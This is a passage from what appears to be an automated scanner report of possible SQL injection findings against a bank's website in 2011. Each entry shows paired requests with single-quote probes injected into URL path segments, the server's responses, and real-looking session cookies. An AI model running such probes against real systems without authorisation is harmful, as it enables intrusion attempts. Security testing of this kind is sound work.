1.43. http://www.bbt.com/bbt/careers/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/careers/

Issue detail

Request 1

GET /bbt/careers'/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:36 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/careers''/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:36 GMT
location: http://www.bbt.com/bbt/careers%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 136
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/careers%27%27/">here</a>.</body>

1.44. http://www.bbt.com/bbt/contactus.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/contactus.html

Issue detail

Request 1

GET /bbt'/contactus.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt''/contactus.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:24 GMT
location: http://www.bbt.com/bbt/%27%27/contactus.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 143
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/contactus.html">here</a>.</body>

1.45. http://www.bbt.com/bbt/contactus.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/contactus.html

Issue detail

Request 1

GET /bbt/contactus.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:40 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/contactus.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:40 GMT
location: http://www.bbt.com/bbt/contactus.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 142
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/contactus.html%27%27">here</a>.</body>

1.46. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/css/topNav.css

Issue detail

Request 1

GET /bbt'/css/topNav.css HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:11:43 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/css/topNav.css HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:11:43 GMT
location: http://www.bbt.com/bbt/%27%27/css/topNav.css
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 143
cache-control: private
x-powered-by: ASP.NET
Content-Length: 147

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/css/topNav.css">here</a>.</body>

1.47. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/css/topNav.css

Issue detail

Request 1

GET /bbt/css'/topNav.css HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:12:30 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/css''/topNav.css HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:31 GMT
location: http://www.bbt.com/bbt/css%27%27/topNav.css
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 142
cache-control: private
x-powered-by: ASP.NET
Content-Length: 146

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/css%27%27/topNav.css">here</a>.</body>

1.48. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/css/topNav.css

Issue detail

Request 1

GET /bbt/css/topNav.css' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:12:44 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/css/topNav.css'' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:44 GMT
location: http://www.bbt.com/bbt/css/topNav.css%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 142
cache-control: private
x-powered-by: ASP.NET
Content-Length: 146

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/css/topNav.css%27%27">here</a>.</body>

1.49. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/customerservice/default.html

Issue detail

Request 1

GET /bbt'/customerservice/default.html?WT.svl=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:30 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/customerservice/default.html?WT.svl=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:30 GMT
location: http://www.bbt.com/bbt/%27%27/customerservice/default.html?WT.svl=1
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 166
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/customerservice/default.html?WT.svl=1">here</a>.</body>

1.50. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/customerservice/default.html

Issue detail

Request 1

GET /bbt/customerservice'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:42 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/customerservice''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:42 GMT
location: http://www.bbt.com/bbt/customerservice%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 156
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/customerservice%27%27/default.html">here</a>.</body>

1.51. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/customerservice/default.html

Issue detail

Request 1

GET /bbt/customerservice/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/customerservice/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:49 GMT
location: http://www.bbt.com/bbt/customerservice/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 156
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/customerservice/default.html%27%27">here</a>.</body>

1.52. http://www.bbt.com/bbt/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/default.html

Issue detail

Request 1

GET /bbt'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:01 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:01 GMT
location: http://www.bbt.com/bbt/%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 141
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/default.html">here</a>.</body>

1.53. http://www.bbt.com/bbt/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/default.html

Issue detail

Request 1

GET /bbt/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:21 GMT
